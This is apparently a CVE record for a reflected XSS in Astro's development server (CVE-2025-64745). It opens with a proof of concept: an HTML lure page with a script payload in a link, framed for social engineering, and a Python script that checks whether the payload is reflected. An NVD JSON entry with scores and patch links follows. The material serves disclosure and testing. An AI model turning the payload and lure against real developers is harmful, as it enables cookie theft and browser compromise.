CVE-2025-64745

<!-- CVE-2025-64745 PoC: Reflected XSS in Astro development server --> <!-- When trailingSlash config is enabled, inject XSS payload in URL --> <!-- Example malicious URL --> <!-- http://localhost:4321/<script>alert(document.cookie)</script> --> <!-- HTML PoC (to be served via social engineering) --> <html> <body> <h2>CVE-2025-64745 PoC</h2> <p>Click the link below to trigger the XSS vulnerability:</p> <a href="http://localhost:4321/%3Cscript%3Ealert(document.cookie)%3C/script%3E" target="_blank"> Click me (Malicious Link) </a> <p>Or visit directly: http://localhost:4321/<script>alert('XSS')</script></p> </body> </html> <!-- Python PoC script --> import requests target = "http://localhost:4321" xss_payload = "<script>alert(document.cookie)</script>" malicious_url = f"{target}/{xss_payload}" print(f"[*] Sending malicious request to: {malicious_url}") response = requests.get(malicious_url) print(f"[*] Response status: {response.status_code}") print(f"[*] XSS payload reflected in response: {xss_payload in response.text}")

{"cve": {"id": "CVE-2025-64745", "sourceIdentifier": "[email protected]", "published": "2025-11-13T21:15:54.240", "lastModified": "2025-11-25T15:13:14.937", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Astro is a web framework. Starting in version 5.2.0 and prior to version 5.15.6, a Reflected Cross-Site Scripting (XSS) vulnerability exists in Astro's development server error pages when the `trailingSlash` configuration option is used. An attacker can inject arbitrary JavaScript code that executes in the victim's browser context by crafting a malicious URL. While this vulnerability only affects the development server and not production builds, it could be exploited to compromise developer environments through social engineering or malicious links. Version 5.15.6 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:astro:astro:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "5.2.0", "versionEndExcluding": "5.15.6", "matchCriteriaId": "2EE0E141-B44E-460F-BB2E-0FBF0D7B6E43"}]}]}], "references": [{"url": "https://github.com/withastro/astro/blob/5bc37fd5cade62f753aef66efdf40f982379029a/packages/astro/src/template/4xx.ts#L133-L149", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/withastro/astro/commit/790d9425f39bbbb462f1c27615781cd965009f91", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/withastro/astro/pull/12994", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/withastro/astro/security/advisories/GHSA-w2vj-39qv-7vh7", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}